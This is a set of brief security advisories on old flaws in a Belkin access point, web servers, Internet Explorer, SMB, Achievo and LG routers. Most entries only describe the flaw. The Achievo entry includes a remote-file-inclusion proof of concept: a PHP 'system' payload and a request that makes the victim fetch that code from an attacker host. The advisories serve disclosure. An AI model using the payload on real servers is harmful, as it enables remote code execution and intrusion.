A denial of service vulnerability has been reported in the Belkin F5D6130 Wireless Network Access Point. Reportedly, this issue may be exploited by making a sequence of SNMP requests. A valid community name is not required. After a number of SNMP requests are made, the device will fail to respond to further requests. Additionally, all wireless connections will be dropped, and new connections refused. Under some conditions, the device may also fail to respond on the ethernet interface.
php(Reactor) does not sufficiently sanitize HTML from various fields, allowing an attacker to inject arbitrary HTML and script code into these fields. This code will execute in the context of the vulnerable website, potentially allowing the attacker to access the user's cookies.
Cross site scripting vulnerabilities have been reported in multiple sample scripts including with OmniHTTPD. In particular, test.shtml and test.php contain errors. This type of vulnerability may be used to steal cookies or perform other web-based attacks.
Blazix is a freely available, open source web server written in Java. It is available for Linux and Microsoft Windows operating systems. Blazix does not properly handle some special characters when appended to requests. By passing a special character with a request to the web server, it is possible for a user to gain access to a listing of a password protected directory. This could result in information disclosure, and could potentially be used to gain intelligence in launching an attack against a system.
When a user passes a request to the web server that ends in either a plus (+) or backslash (), the web server may react unpredictably. This type of character appended to the name of a .jsp file has been reported to reveal the contents of the .jsp file.
Microsoft Internet Explorer includes support for dialog windows through script calls to the two functions showModalDialog and showModelessDialog. These functions accept a URL location for the dialog content, and an option argument parameter to allow data to be passed to the dialog from the calling page. A check is done to ensure that data is only passed to dialogs located in the same domain as the calling page. However, if the URL provided as the dialog source redirects to a second location, only the first is subject to this security check. Exploitation may allow malicious content to be inserted into sensitive dialogs. Execution of arbitrary script within the Local Computer Zone has been demonstrated.
A buffer overflow vulnerability has been reported in Microsoft Internet Explorer's Legacy Text Formatting ActiveX control. The Legacy Text Formatting ActiveX control is used by Internet Explorer to display specially formatted text. Reportedly, the ActiveX control is vulnerable to a buffer overflow condition. Microsoft has reported that the specific ActiveX control is not installed by default as part of Internet Explorer. The control, however, will be downloaded as it is needed from a Microsoft Web Site.
A buffer overflow vulnerability has been reported in the handling of some malformed SMB requests. An attacker may send a malformed SMB request packet in order to exploit this condition. It has been reported possible to corrupt heap memory, leading to a crash of the underlying system. It may prove possible to exploit this vulnerability to execute arbitrary code and gain local access to the vulnerable system. This possibility has not, however, been confirmed. Reportedly, this vulnerability may be exploited both as an authenticated user, and with anonymous access to the service.
Achievo includes a PHP script which is used to generate JavaScript (class.atkdateattribute.js.php). This script employs a number of PHP include_once() statements to call code contained in function libraries and grab configuration information. Attackers may subvert the variable ($config_atkroot) which is used to store the location of the external files and specify an arbitrary location, such as an attacker-supplied PHP script on a remote host. Exploitation of this issue will enable the remote attacker to execute commands with the privileges of the webserver hosting the vulnerable software. Create the following text file (ls.txt) and store it on the attacker host where it is publicly accessible: <?php system('ls'); ?> And cause the vulnerable script on the victim host to invoke it with the following request: http://victimhost/achievo/atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://attackerhost/ls.txt?
LG routers are vulnerable to a denial of service attack when scanned with nmap using the fingerprinting option. When the router is scanned with a tool such as nmap, and the fingerprinting option is enabled, the router may crash.
Services By CQR